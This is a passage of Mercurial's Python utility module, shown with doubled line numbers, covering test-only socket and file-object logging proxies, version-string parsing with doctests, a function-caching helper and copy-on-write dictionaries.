573 return object.__getattribute__(self, r'_observedcall')(
574 r'detach', *args, **kwargs)
574 r'detach', *args, **kwargs)
575
575
576 def read1(self, *args, **kwargs):
576 def read1(self, *args, **kwargs):
577 return object.__getattribute__(self, r'_observedcall')(
577 return object.__getattribute__(self, r'_observedcall')(
578 r'read1', *args, **kwargs)
578 r'read1', *args, **kwargs)
579
579
580 class observedbufferedinputpipe(bufferedinputpipe):
580 class observedbufferedinputpipe(bufferedinputpipe):
581 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
581 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
582
582
583 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
583 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
584 bypass ``fileobjectproxy``. Because of this, we need to make
584 bypass ``fileobjectproxy``. Because of this, we need to make
585 ``bufferedinputpipe`` aware of these operations.
585 ``bufferedinputpipe`` aware of these operations.
586
586
587 This variation of ``bufferedinputpipe`` can notify observers about
587 This variation of ``bufferedinputpipe`` can notify observers about
588 ``os.read()`` events. It also re-publishes other events, such as
588 ``os.read()`` events. It also re-publishes other events, such as
589 ``read()`` and ``readline()``.
589 ``read()`` and ``readline()``.
590 """
590 """
591 def _fillbuffer(self):
591 def _fillbuffer(self):
592 res = super(observedbufferedinputpipe, self)._fillbuffer()
592 res = super(observedbufferedinputpipe, self)._fillbuffer()
593
593
594 fn = getattr(self._input._observer, r'osread', None)
594 fn = getattr(self._input._observer, r'osread', None)
595 if fn:
595 if fn:
596 fn(res, _chunksize)
596 fn(res, _chunksize)
597
597
598 return res
598 return res
599
599
600 # We use different observer methods because the operation isn't
600 # We use different observer methods because the operation isn't
601 # performed on the actual file object but on us.
601 # performed on the actual file object but on us.
602 def read(self, size):
602 def read(self, size):
603 res = super(observedbufferedinputpipe, self).read(size)
603 res = super(observedbufferedinputpipe, self).read(size)
604
604
605 fn = getattr(self._input._observer, r'bufferedread', None)
605 fn = getattr(self._input._observer, r'bufferedread', None)
606 if fn:
606 if fn:
607 fn(res, size)
607 fn(res, size)
608
608
609 return res
609 return res
610
610
611 def readline(self, *args, **kwargs):
611 def readline(self, *args, **kwargs):
612 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
612 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
613
613
614 fn = getattr(self._input._observer, r'bufferedreadline', None)
614 fn = getattr(self._input._observer, r'bufferedreadline', None)
615 if fn:
615 if fn:
616 fn(res)
616 fn(res)
617
617
618 return res
618 return res
619
619
620 PROXIED_SOCKET_METHODS = {
620 PROXIED_SOCKET_METHODS = {
621 r'makefile',
621 r'makefile',
622 r'recv',
622 r'recv',
623 r'recvfrom',
623 r'recvfrom',
624 r'recvfrom_into',
624 r'recvfrom_into',
625 r'recv_into',
625 r'recv_into',
626 r'send',
626 r'send',
627 r'sendall',
627 r'sendall',
628 r'sendto',
628 r'sendto',
629 r'setblocking',
629 r'setblocking',
630 r'settimeout',
630 r'settimeout',
631 r'gettimeout',
631 r'gettimeout',
632 r'setsockopt',
632 r'setsockopt',
633 }
633 }
634
634
635 class socketproxy(object):
635 class socketproxy(object):
636 """A proxy around a socket that tells a watcher when events occur.
636 """A proxy around a socket that tells a watcher when events occur.
637
637
638 This is like ``fileobjectproxy`` except for sockets.
638 This is like ``fileobjectproxy`` except for sockets.
639
639
640 This type is intended to only be used for testing purposes. Think hard
640 This type is intended to only be used for testing purposes. Think hard
641 before using it in important code.
641 before using it in important code.
642 """
642 """
643 __slots__ = (
643 __slots__ = (
644 r'_orig',
644 r'_orig',
645 r'_observer',
645 r'_observer',
646 )
646 )
647
647
648 def __init__(self, sock, observer):
648 def __init__(self, sock, observer):
649 object.__setattr__(self, r'_orig', sock)
649 object.__setattr__(self, r'_orig', sock)
650 object.__setattr__(self, r'_observer', observer)
650 object.__setattr__(self, r'_observer', observer)
651
651
652 def __getattribute__(self, name):
652 def __getattribute__(self, name):
653 if name in PROXIED_SOCKET_METHODS:
653 if name in PROXIED_SOCKET_METHODS:
654 return object.__getattribute__(self, name)
654 return object.__getattribute__(self, name)
655
655
656 return getattr(object.__getattribute__(self, r'_orig'), name)
656 return getattr(object.__getattribute__(self, r'_orig'), name)
657
657
658 def __delattr__(self, name):
658 def __delattr__(self, name):
659 return delattr(object.__getattribute__(self, r'_orig'), name)
659 return delattr(object.__getattribute__(self, r'_orig'), name)
660
660
661 def __setattr__(self, name, value):
661 def __setattr__(self, name, value):
662 return setattr(object.__getattribute__(self, r'_orig'), name, value)
662 return setattr(object.__getattribute__(self, r'_orig'), name, value)
663
663
664 def __nonzero__(self):
664 def __nonzero__(self):
665 return bool(object.__getattribute__(self, r'_orig'))
665 return bool(object.__getattribute__(self, r'_orig'))
666
666
667 __bool__ = __nonzero__
667 __bool__ = __nonzero__
668
668
669 def _observedcall(self, name, *args, **kwargs):
669 def _observedcall(self, name, *args, **kwargs):
670 # Call the original object.
670 # Call the original object.
671 orig = object.__getattribute__(self, r'_orig')
671 orig = object.__getattribute__(self, r'_orig')
672 res = getattr(orig, name)(*args, **kwargs)
672 res = getattr(orig, name)(*args, **kwargs)
673
673
674 # Call a method on the observer of the same name with arguments
674 # Call a method on the observer of the same name with arguments
675 # so it can react, log, etc.
675 # so it can react, log, etc.
676 observer = object.__getattribute__(self, r'_observer')
676 observer = object.__getattribute__(self, r'_observer')
677 fn = getattr(observer, name, None)
677 fn = getattr(observer, name, None)
678 if fn:
678 if fn:
679 fn(res, *args, **kwargs)
679 fn(res, *args, **kwargs)
680
680
681 return res
681 return res
682
682
683 def makefile(self, *args, **kwargs):
683 def makefile(self, *args, **kwargs):
684 res = object.__getattribute__(self, r'_observedcall')(
684 res = object.__getattribute__(self, r'_observedcall')(
685 r'makefile', *args, **kwargs)
685 r'makefile', *args, **kwargs)
686
686
687 # The file object may be used for I/O. So we turn it into a
687 # The file object may be used for I/O. So we turn it into a
688 # proxy using our observer.
688 # proxy using our observer.
689 observer = object.__getattribute__(self, r'_observer')
689 observer = object.__getattribute__(self, r'_observer')
690 return makeloggingfileobject(observer.fh, res, observer.name,
690 return makeloggingfileobject(observer.fh, res, observer.name,
691 reads=observer.reads,
691 reads=observer.reads,
692 writes=observer.writes,
692 writes=observer.writes,
693 logdata=observer.logdata,
693 logdata=observer.logdata,
694 logdataapis=observer.logdataapis)
694 logdataapis=observer.logdataapis)
695
695
696 def recv(self, *args, **kwargs):
696 def recv(self, *args, **kwargs):
697 return object.__getattribute__(self, r'_observedcall')(
697 return object.__getattribute__(self, r'_observedcall')(
698 r'recv', *args, **kwargs)
698 r'recv', *args, **kwargs)
699
699
700 def recvfrom(self, *args, **kwargs):
700 def recvfrom(self, *args, **kwargs):
701 return object.__getattribute__(self, r'_observedcall')(
701 return object.__getattribute__(self, r'_observedcall')(
702 r'recvfrom', *args, **kwargs)
702 r'recvfrom', *args, **kwargs)
703
703
704 def recvfrom_into(self, *args, **kwargs):
704 def recvfrom_into(self, *args, **kwargs):
705 return object.__getattribute__(self, r'_observedcall')(
705 return object.__getattribute__(self, r'_observedcall')(
706 r'recvfrom_into', *args, **kwargs)
706 r'recvfrom_into', *args, **kwargs)
707
707
708 def recv_into(self, *args, **kwargs):
708 def recv_into(self, *args, **kwargs):
709 return object.__getattribute__(self, r'_observedcall')(
709 return object.__getattribute__(self, r'_observedcall')(
710 r'recv_info', *args, **kwargs)
710 r'recv_info', *args, **kwargs)
711
711
712 def send(self, *args, **kwargs):
712 def send(self, *args, **kwargs):
713 return object.__getattribute__(self, r'_observedcall')(
713 return object.__getattribute__(self, r'_observedcall')(
714 r'send', *args, **kwargs)
714 r'send', *args, **kwargs)
715
715
716 def sendall(self, *args, **kwargs):
716 def sendall(self, *args, **kwargs):
717 return object.__getattribute__(self, r'_observedcall')(
717 return object.__getattribute__(self, r'_observedcall')(
718 r'sendall', *args, **kwargs)
718 r'sendall', *args, **kwargs)
719
719
720 def sendto(self, *args, **kwargs):
720 def sendto(self, *args, **kwargs):
721 return object.__getattribute__(self, r'_observedcall')(
721 return object.__getattribute__(self, r'_observedcall')(
722 r'sendto', *args, **kwargs)
722 r'sendto', *args, **kwargs)
723
723
724 def setblocking(self, *args, **kwargs):
724 def setblocking(self, *args, **kwargs):
725 return object.__getattribute__(self, r'_observedcall')(
725 return object.__getattribute__(self, r'_observedcall')(
726 r'setblocking', *args, **kwargs)
726 r'setblocking', *args, **kwargs)
727
727
728 def settimeout(self, *args, **kwargs):
728 def settimeout(self, *args, **kwargs):
729 return object.__getattribute__(self, r'_observedcall')(
729 return object.__getattribute__(self, r'_observedcall')(
730 r'settimeout', *args, **kwargs)
730 r'settimeout', *args, **kwargs)
731
731
732 def gettimeout(self, *args, **kwargs):
732 def gettimeout(self, *args, **kwargs):
733 return object.__getattribute__(self, r'_observedcall')(
733 return object.__getattribute__(self, r'_observedcall')(
734 r'gettimeout', *args, **kwargs)
734 r'gettimeout', *args, **kwargs)
735
735
736 def setsockopt(self, *args, **kwargs):
736 def setsockopt(self, *args, **kwargs):
737 return object.__getattribute__(self, r'_observedcall')(
737 return object.__getattribute__(self, r'_observedcall')(
738 r'setsockopt', *args, **kwargs)
738 r'setsockopt', *args, **kwargs)
739
739
740 class baseproxyobserver(object):
740 class baseproxyobserver(object):
741 def _writedata(self, data):
741 def _writedata(self, data):
742 if not self.logdata:
742 if not self.logdata:
743 if self.logdataapis:
743 if self.logdataapis:
744 self.fh.write('\n')
744 self.fh.write('\n')
745 self.fh.flush()
745 self.fh.flush()
746 return
746 return
747
747
748 # Simple case writes all data on a single line.
748 # Simple case writes all data on a single line.
749 if b'\n' not in data:
749 if b'\n' not in data:
750 if self.logdataapis:
750 if self.logdataapis:
751 self.fh.write(': %s\n' % stringutil.escapedata(data))
751 self.fh.write(': %s\n' % stringutil.escapedata(data))
752 else:
752 else:
753 self.fh.write('%s> %s\n'
753 self.fh.write('%s> %s\n'
754 % (self.name, stringutil.escapedata(data)))
754 % (self.name, stringutil.escapedata(data)))
755 self.fh.flush()
755 self.fh.flush()
756 return
756 return
757
757
758 # Data with newlines is written to multiple lines.
758 # Data with newlines is written to multiple lines.
759 if self.logdataapis:
759 if self.logdataapis:
760 self.fh.write(':\n')
760 self.fh.write(':\n')
761
761
762 lines = data.splitlines(True)
762 lines = data.splitlines(True)
763 for line in lines:
763 for line in lines:
764 self.fh.write('%s> %s\n'
764 self.fh.write('%s> %s\n'
765 % (self.name, stringutil.escapedata(line)))
765 % (self.name, stringutil.escapedata(line)))
766 self.fh.flush()
766 self.fh.flush()
767
767
768 class fileobjectobserver(baseproxyobserver):
768 class fileobjectobserver(baseproxyobserver):
769 """Logs file object activity."""
769 """Logs file object activity."""
770 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
770 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
771 logdataapis=True):
771 logdataapis=True):
772 self.fh = fh
772 self.fh = fh
773 self.name = name
773 self.name = name
774 self.logdata = logdata
774 self.logdata = logdata
775 self.logdataapis = logdataapis
775 self.logdataapis = logdataapis
776 self.reads = reads
776 self.reads = reads
777 self.writes = writes
777 self.writes = writes
778
778
779 def read(self, res, size=-1):
779 def read(self, res, size=-1):
780 if not self.reads:
780 if not self.reads:
781 return
781 return
782 # Python 3 can return None from reads at EOF instead of empty strings.
782 # Python 3 can return None from reads at EOF instead of empty strings.
783 if res is None:
783 if res is None:
784 res = ''
784 res = ''
785
785
786 if self.logdataapis:
786 if self.logdataapis:
787 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
787 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
788
788
789 self._writedata(res)
789 self._writedata(res)
790
790
791 def readline(self, res, limit=-1):
791 def readline(self, res, limit=-1):
792 if not self.reads:
792 if not self.reads:
793 return
793 return
794
794
795 if self.logdataapis:
795 if self.logdataapis:
796 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
796 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
797
797
798 self._writedata(res)
798 self._writedata(res)
799
799
800 def readinto(self, res, dest):
800 def readinto(self, res, dest):
801 if not self.reads:
801 if not self.reads:
802 return
802 return
803
803
804 if self.logdataapis:
804 if self.logdataapis:
805 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
805 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
806 res))
806 res))
807
807
808 data = dest[0:res] if res is not None else b''
808 data = dest[0:res] if res is not None else b''
809 self._writedata(data)
809 self._writedata(data)
810
810
811 def write(self, res, data):
811 def write(self, res, data):
812 if not self.writes:
812 if not self.writes:
813 return
813 return
814
814
815 # Python 2 returns None from some write() calls. Python 3 (reasonably)
815 # Python 2 returns None from some write() calls. Python 3 (reasonably)
816 # returns the integer bytes written.
816 # returns the integer bytes written.
817 if res is None and data:
817 if res is None and data:
818 res = len(data)
818 res = len(data)
819
819
820 if self.logdataapis:
820 if self.logdataapis:
821 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
821 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
822
822
823 self._writedata(data)
823 self._writedata(data)
824
824
825 def flush(self, res):
825 def flush(self, res):
826 if not self.writes:
826 if not self.writes:
827 return
827 return
828
828
829 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
829 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
830
830
831 # For observedbufferedinputpipe.
831 # For observedbufferedinputpipe.
832 def bufferedread(self, res, size):
832 def bufferedread(self, res, size):
833 if not self.reads:
833 if not self.reads:
834 return
834 return
835
835
836 if self.logdataapis:
836 if self.logdataapis:
837 self.fh.write('%s> bufferedread(%d) -> %d' % (
837 self.fh.write('%s> bufferedread(%d) -> %d' % (
838 self.name, size, len(res)))
838 self.name, size, len(res)))
839
839
840 self._writedata(res)
840 self._writedata(res)
841
841
842 def bufferedreadline(self, res):
842 def bufferedreadline(self, res):
843 if not self.reads:
843 if not self.reads:
844 return
844 return
845
845
846 if self.logdataapis:
846 if self.logdataapis:
847 self.fh.write('%s> bufferedreadline() -> %d' % (
847 self.fh.write('%s> bufferedreadline() -> %d' % (
848 self.name, len(res)))
848 self.name, len(res)))
849
849
850 self._writedata(res)
850 self._writedata(res)
851
851
852 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
852 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
853 logdata=False, logdataapis=True):
853 logdata=False, logdataapis=True):
854 """Turn a file object into a logging file object."""
854 """Turn a file object into a logging file object."""
855
855
856 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
856 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
857 logdata=logdata, logdataapis=logdataapis)
857 logdata=logdata, logdataapis=logdataapis)
858 return fileobjectproxy(fh, observer)
858 return fileobjectproxy(fh, observer)
859
859
860 class socketobserver(baseproxyobserver):
860 class socketobserver(baseproxyobserver):
861 """Logs socket activity."""
861 """Logs socket activity."""
862 def __init__(self, fh, name, reads=True, writes=True, states=True,
862 def __init__(self, fh, name, reads=True, writes=True, states=True,
863 logdata=False, logdataapis=True):
863 logdata=False, logdataapis=True):
864 self.fh = fh
864 self.fh = fh
865 self.name = name
865 self.name = name
866 self.reads = reads
866 self.reads = reads
867 self.writes = writes
867 self.writes = writes
868 self.states = states
868 self.states = states
869 self.logdata = logdata
869 self.logdata = logdata
870 self.logdataapis = logdataapis
870 self.logdataapis = logdataapis
871
871
872 def makefile(self, res, mode=None, bufsize=None):
872 def makefile(self, res, mode=None, bufsize=None):
873 if not self.states:
873 if not self.states:
874 return
874 return
875
875
876 self.fh.write('%s> makefile(%r, %r)\n' % (
876 self.fh.write('%s> makefile(%r, %r)\n' % (
877 self.name, mode, bufsize))
877 self.name, mode, bufsize))
878
878
879 def recv(self, res, size, flags=0):
879 def recv(self, res, size, flags=0):
880 if not self.reads:
880 if not self.reads:
881 return
881 return
882
882
883 if self.logdataapis:
883 if self.logdataapis:
884 self.fh.write('%s> recv(%d, %d) -> %d' % (
884 self.fh.write('%s> recv(%d, %d) -> %d' % (
885 self.name, size, flags, len(res)))
885 self.name, size, flags, len(res)))
886 self._writedata(res)
886 self._writedata(res)
887
887
888 def recvfrom(self, res, size, flags=0):
888 def recvfrom(self, res, size, flags=0):
889 if not self.reads:
889 if not self.reads:
890 return
890 return
891
891
892 if self.logdataapis:
892 if self.logdataapis:
893 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
893 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
894 self.name, size, flags, len(res[0])))
894 self.name, size, flags, len(res[0])))
895
895
896 self._writedata(res[0])
896 self._writedata(res[0])
897
897
898 def recvfrom_into(self, res, buf, size, flags=0):
898 def recvfrom_into(self, res, buf, size, flags=0):
899 if not self.reads:
899 if not self.reads:
900 return
900 return
901
901
902 if self.logdataapis:
902 if self.logdataapis:
903 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
903 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
904 self.name, size, flags, res[0]))
904 self.name, size, flags, res[0]))
905
905
906 self._writedata(buf[0:res[0]])
906 self._writedata(buf[0:res[0]])
907
907
908 def recv_into(self, res, buf, size=0, flags=0):
908 def recv_into(self, res, buf, size=0, flags=0):
909 if not self.reads:
909 if not self.reads:
910 return
910 return
911
911
912 if self.logdataapis:
912 if self.logdataapis:
913 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
913 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
914 self.name, size, flags, res))
914 self.name, size, flags, res))
915
915
916 self._writedata(buf[0:res])
916 self._writedata(buf[0:res])
917
917
918 def send(self, res, data, flags=0):
918 def send(self, res, data, flags=0):
919 if not self.writes:
919 if not self.writes:
920 return
920 return
921
921
922 self.fh.write('%s> send(%d, %d) -> %d' % (
922 self.fh.write('%s> send(%d, %d) -> %d' % (
923 self.name, len(data), flags, len(res)))
923 self.name, len(data), flags, len(res)))
924 self._writedata(data)
924 self._writedata(data)
925
925
926 def sendall(self, res, data, flags=0):
926 def sendall(self, res, data, flags=0):
927 if not self.writes:
927 if not self.writes:
928 return
928 return
929
929
930 if self.logdataapis:
930 if self.logdataapis:
931 # Returns None on success. So don't bother reporting return value.
931 # Returns None on success. So don't bother reporting return value.
932 self.fh.write('%s> sendall(%d, %d)' % (
932 self.fh.write('%s> sendall(%d, %d)' % (
933 self.name, len(data), flags))
933 self.name, len(data), flags))
934
934
935 self._writedata(data)
935 self._writedata(data)
936
936
937 def sendto(self, res, data, flagsoraddress, address=None):
937 def sendto(self, res, data, flagsoraddress, address=None):
938 if not self.writes:
938 if not self.writes:
939 return
939 return
940
940
941 if address:
941 if address:
942 flags = flagsoraddress
942 flags = flagsoraddress
943 else:
943 else:
944 flags = 0
944 flags = 0
945
945
946 if self.logdataapis:
946 if self.logdataapis:
947 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
947 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
948 self.name, len(data), flags, address, res))
948 self.name, len(data), flags, address, res))
949
949
950 self._writedata(data)
950 self._writedata(data)
951
951
952 def setblocking(self, res, flag):
952 def setblocking(self, res, flag):
953 if not self.states:
953 if not self.states:
954 return
954 return
955
955
956 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
956 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
957
957
958 def settimeout(self, res, value):
958 def settimeout(self, res, value):
959 if not self.states:
959 if not self.states:
960 return
960 return
961
961
962 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
962 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
963
963
964 def gettimeout(self, res):
964 def gettimeout(self, res):
965 if not self.states:
965 if not self.states:
966 return
966 return
967
967
968 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
968 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
969
969
970 def setsockopt(self, level, optname, value):
970 def setsockopt(self, level, optname, value):
971 if not self.states:
971 if not self.states:
972 return
972 return
973
973
974 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
974 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
975 self.name, level, optname, value))
975 self.name, level, optname, value))
976
976
977 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
977 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
978 logdata=False, logdataapis=True):
978 logdata=False, logdataapis=True):
979 """Turn a socket into a logging socket."""
979 """Turn a socket into a logging socket."""
980
980
981 observer = socketobserver(logh, name, reads=reads, writes=writes,
981 observer = socketobserver(logh, name, reads=reads, writes=writes,
982 states=states, logdata=logdata,
982 states=states, logdata=logdata,
983 logdataapis=logdataapis)
983 logdataapis=logdataapis)
984 return socketproxy(fh, observer)
984 return socketproxy(fh, observer)
985
985
986 def version():
986 def version():
987 """Return version information if available."""
987 """Return version information if available."""
988 try:
988 try:
989 from . import __version__
989 from . import __version__
990 return __version__.version
990 return __version__.version
991 except ImportError:
991 except ImportError:
992 return 'unknown'
992 return 'unknown'
993
993
994 def versiontuple(v=None, n=4):
994 def versiontuple(v=None, n=4):
995 """Parses a Mercurial version string into an N-tuple.
995 """Parses a Mercurial version string into an N-tuple.
996
996
997 The version string to be parsed is specified with the ``v`` argument.
997 The version string to be parsed is specified with the ``v`` argument.
998 If it isn't defined, the current Mercurial version string will be parsed.
998 If it isn't defined, the current Mercurial version string will be parsed.
999
999
1000 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1000 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1001 returned values:
1001 returned values:
1002
1002
1003 >>> v = b'3.6.1+190-df9b73d2d444'
1003 >>> v = b'3.6.1+190-df9b73d2d444'
1004 >>> versiontuple(v, 2)
1004 >>> versiontuple(v, 2)
1005 (3, 6)
1005 (3, 6)
1006 >>> versiontuple(v, 3)
1006 >>> versiontuple(v, 3)
1007 (3, 6, 1)
1007 (3, 6, 1)
1008 >>> versiontuple(v, 4)
1008 >>> versiontuple(v, 4)
1009 (3, 6, 1, '190-df9b73d2d444')
1009 (3, 6, 1, '190-df9b73d2d444')
1010
1010
1011 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1011 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1012 (3, 6, 1, '190-df9b73d2d444+20151118')
1012 (3, 6, 1, '190-df9b73d2d444+20151118')
1013
1013
1014 >>> v = b'3.6'
1014 >>> v = b'3.6'
1015 >>> versiontuple(v, 2)
1015 >>> versiontuple(v, 2)
1016 (3, 6)
1016 (3, 6)
1017 >>> versiontuple(v, 3)
1017 >>> versiontuple(v, 3)
1018 (3, 6, None)
1018 (3, 6, None)
1019 >>> versiontuple(v, 4)
1019 >>> versiontuple(v, 4)
1020 (3, 6, None, None)
1020 (3, 6, None, None)
1021
1021
1022 >>> v = b'3.9-rc'
1022 >>> v = b'3.9-rc'
1023 >>> versiontuple(v, 2)
1023 >>> versiontuple(v, 2)
1024 (3, 9)
1024 (3, 9)
1025 >>> versiontuple(v, 3)
1025 >>> versiontuple(v, 3)
1026 (3, 9, None)
1026 (3, 9, None)
1027 >>> versiontuple(v, 4)
1027 >>> versiontuple(v, 4)
1028 (3, 9, None, 'rc')
1028 (3, 9, None, 'rc')
1029
1029
1030 >>> v = b'3.9-rc+2-02a8fea4289b'
1030 >>> v = b'3.9-rc+2-02a8fea4289b'
1031 >>> versiontuple(v, 2)
1031 >>> versiontuple(v, 2)
1032 (3, 9)
1032 (3, 9)
1033 >>> versiontuple(v, 3)
1033 >>> versiontuple(v, 3)
1034 (3, 9, None)
1034 (3, 9, None)
1035 >>> versiontuple(v, 4)
1035 >>> versiontuple(v, 4)
1036 (3, 9, None, 'rc+2-02a8fea4289b')
1036 (3, 9, None, 'rc+2-02a8fea4289b')
1037 """
1037 """
1038 if not v:
1038 if not v:
1039 v = version()
1039 v = version()
1040 parts = remod.split('[\+-]', v, 1)
1040 parts = remod.split('[\+-]', v, 1)
1041 if len(parts) == 1:
1041 if len(parts) == 1:
1042 vparts, extra = parts[0], None
1042 vparts, extra = parts[0], None
1043 else:
1043 else:
1044 vparts, extra = parts
1044 vparts, extra = parts
1045
1045
1046 vints = []
1046 vints = []
1047 for i in vparts.split('.'):
1047 for i in vparts.split('.'):
1048 try:
1048 try:
1049 vints.append(int(i))
1049 vints.append(int(i))
1050 except ValueError:
1050 except ValueError:
1051 break
1051 break
1052 # (3, 6) -> (3, 6, None)
1052 # (3, 6) -> (3, 6, None)
1053 while len(vints) < 3:
1053 while len(vints) < 3:
1054 vints.append(None)
1054 vints.append(None)
1055
1055
1056 if n == 2:
1056 if n == 2:
1057 return (vints[0], vints[1])
1057 return (vints[0], vints[1])
1058 if n == 3:
1058 if n == 3:
1059 return (vints[0], vints[1], vints[2])
1059 return (vints[0], vints[1], vints[2])
1060 if n == 4:
1060 if n == 4:
1061 return (vints[0], vints[1], vints[2], extra)
1061 return (vints[0], vints[1], vints[2], extra)
1062
1062
1063 def cachefunc(func):
1063 def cachefunc(func):
1064 '''cache the result of function calls'''
1064 '''cache the result of function calls'''
1065 # XXX doesn't handle keywords args
1065 # XXX doesn't handle keywords args
1066 if func.__code__.co_argcount == 0:
1066 if func.__code__.co_argcount == 0:
1067 cache = []
1067 cache = []
1068 def f():
1068 def f():
1069 if len(cache) == 0:
1069 if len(cache) == 0:
1070 cache.append(func())
1070 cache.append(func())
1071 return cache[0]
1071 return cache[0]
1072 return f
1072 return f
1073 cache = {}
1073 cache = {}
1074 if func.__code__.co_argcount == 1:
1074 if func.__code__.co_argcount == 1:
1075 # we gain a small amount of time because
1075 # we gain a small amount of time because
1076 # we don't need to pack/unpack the list
1076 # we don't need to pack/unpack the list
1077 def f(arg):
1077 def f(arg):
1078 if arg not in cache:
1078 if arg not in cache:
1079 cache[arg] = func(arg)
1079 cache[arg] = func(arg)
1080 return cache[arg]
1080 return cache[arg]
1081 else:
1081 else:
1082 def f(*args):
1082 def f(*args):
1083 if args not in cache:
1083 if args not in cache:
1084 cache[args] = func(*args)
1084 cache[args] = func(*args)
1085 return cache[args]
1085 return cache[args]
1086
1086
1087 return f
1087 return f
1088
1088
1089 class cow(object):
1089 class cow(object):
1090 """helper class to make copy-on-write easier
1090 """helper class to make copy-on-write easier
1091
1091
1092 Call preparewrite before doing any writes.
1092 Call preparewrite before doing any writes.
1093 """
1093 """
1094
1094
1095 def preparewrite(self):
1095 def preparewrite(self):
1096 """call this before writes, return self or a copied new object"""
1096 """call this before writes, return self or a copied new object"""
1097 if getattr(self, '_copied', 0):
1097 if getattr(self, '_copied', 0):
1098 self._copied -= 1
1098 self._copied -= 1
1099 return self.__class__(self)
1099 return self.__class__(self)
1100 return self
1100 return self
1101
1101
1102 def copy(self):
1102 def copy(self):
1103 """always do a cheap copy"""
1103 """always do a cheap copy"""
1104 self._copied = getattr(self, '_copied', 0) + 1
1104 self._copied = getattr(self, '_copied', 0) + 1
1105 return self
1105 return self
1106
1106
1107 class sortdict(collections.OrderedDict):
1107 class sortdict(collections.OrderedDict):
1108 '''a simple sorted dictionary
1108 '''a simple sorted dictionary
1109
1109
1110 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1110 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1111 >>> d2 = d1.copy()
1111 >>> d2 = d1.copy()
1112 >>> d2
1112 >>> d2
1113 sortdict([('a', 0), ('b', 1)])
1113 sortdict([('a', 0), ('b', 1)])
1114 >>> d2.update([(b'a', 2)])
1114 >>> d2.update([(b'a', 2)])
1115 >>> list(d2.keys()) # should still be in last-set order
1115 >>> list(d2.keys()) # should still be in last-set order
1116 ['b', 'a']
1116 ['b', 'a']
1117 '''
1117 '''
1118
1118
1119 def __setitem__(self, key, value):
1119 def __setitem__(self, key, value):
1120 if key in self:
1120 if key in self:
1121 del self[key]
1121 del self[key]
1122 super(sortdict, self).__setitem__(key, value)
1122 super(sortdict, self).__setitem__(key, value)
1123
1123
1124 if pycompat.ispypy:
1124 if pycompat.ispypy:
1125 # __setitem__() isn't called as of PyPy 5.8.0
1125 # __setitem__() isn't called as of PyPy 5.8.0
1126 def update(self, src):
1126 def update(self, src):
1127 if isinstance(src, dict):
1127 if isinstance(src, dict):
1128 src = src.iteritems()
1128 src = src.iteritems()
1129 for k, v in src:
1129 for k, v in src:
1130 self[k] = v
1130 self[k] = v
1131
1131
1132 class cowdict(cow, dict):
1132 class cowdict(cow, dict):
1133 """copy-on-write dict
1133 """copy-on-write dict
1134
1134
1135 Be sure to call d = d.preparewrite() before writing to d.
1135 Be sure to call d = d.preparewrite() before writing to d.
1136
1136
1137 >>> a = cowdict()
1137 >>> a = cowdict()
1138 >>> a is a.preparewrite()
1138 >>> a is a.preparewrite()
1139 True
1139 True
1140 >>> b = a.copy()
1140 >>> b = a.copy()
1141 >>> b is a
1141 >>> b is a
1142 True
1142 True
1143 >>> c = b.copy()
1143 >>> c = b.copy()
1144 >>> c is a
1144 >>> c is a
1145 True
1145 True
1146 >>> a = a.preparewrite()
1146 >>> a = a.preparewrite()
1147 >>> b is a
1147 >>> b is a
1148 False
1148 False
1149 >>> a is a.preparewrite()
1149 >>> a is a.preparewrite()
1150 True
1150 True
1151 >>> c = c.preparewrite()
1151 >>> c = c.preparewrite()
1152 >>> b is c
1152 >>> b is c
1153 False
1153 False
1154 >>> b is b.preparewrite()
1154 >>> b is b.preparewrite()
1155 True
1155 True
1156 """
1156 """
1157
1157
1158 class cowsortdict(cow, sortdict):
1158 class cowsortdict(cow, sortdict):
1159 """copy-on-write sortdict
1159 """copy-on-write sortdict
1160
1160
1161 Be sure to call d = d.preparewrite() before writing to d.
1161 Be sure to call d = d.preparewrite() before writing to d.
1162 """
1162 """
1163
1163
1164 class transactional(object):
